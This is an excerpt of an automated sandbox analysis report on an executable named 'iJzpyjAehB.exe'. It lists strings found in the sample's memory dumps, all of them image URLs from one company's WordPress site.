                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-90x75.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/FOOTER.jpg);background-repeat:no-repeat;backgroun
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-150x55.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-1024x375.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-150x55.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-260x95.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-300x110.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-50x18.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-768x281.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-1024x375.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-150x55.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-260x95.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-300x110.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-50x18.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-768x281.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-102
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-150
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-260
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-300
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-50x
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-768
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg
